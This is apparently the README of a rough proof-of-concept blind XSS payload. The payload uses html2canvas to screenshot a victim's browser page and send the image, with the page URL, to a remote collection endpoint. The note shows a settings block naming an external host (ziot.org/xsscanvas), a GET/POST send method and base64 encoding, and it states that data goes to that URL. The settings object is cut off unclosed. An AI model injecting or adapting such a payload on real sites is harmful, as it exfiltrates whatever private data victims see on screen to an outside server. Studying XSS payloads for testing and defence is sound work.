A rough proof-of-concept JavaScript XSS payload utilizing html2canvas for capturing browser screenshots.

I highly recommend using XSSHunter if you want a fully featured blind XSS tool.


var settings = {
    url: "http://ziot.org/xsscanvas/",  // the endpoint where you want the data to go
    sendMethod: "post",                 // method you want to send (get, post)
    iframe: false,                      // iframe post requests
    base64: true,                       // base64 the image data or not
    captureUrl: true,                   // capture url
    gotcha: false,                      
    width: 800,                         // resize screenshot width
    height: 800,                        // resize screenshot height
    multiRequests: false,               // send multiple requests for long urls

Request Variables

Data is sent to settings.url via GET or POST.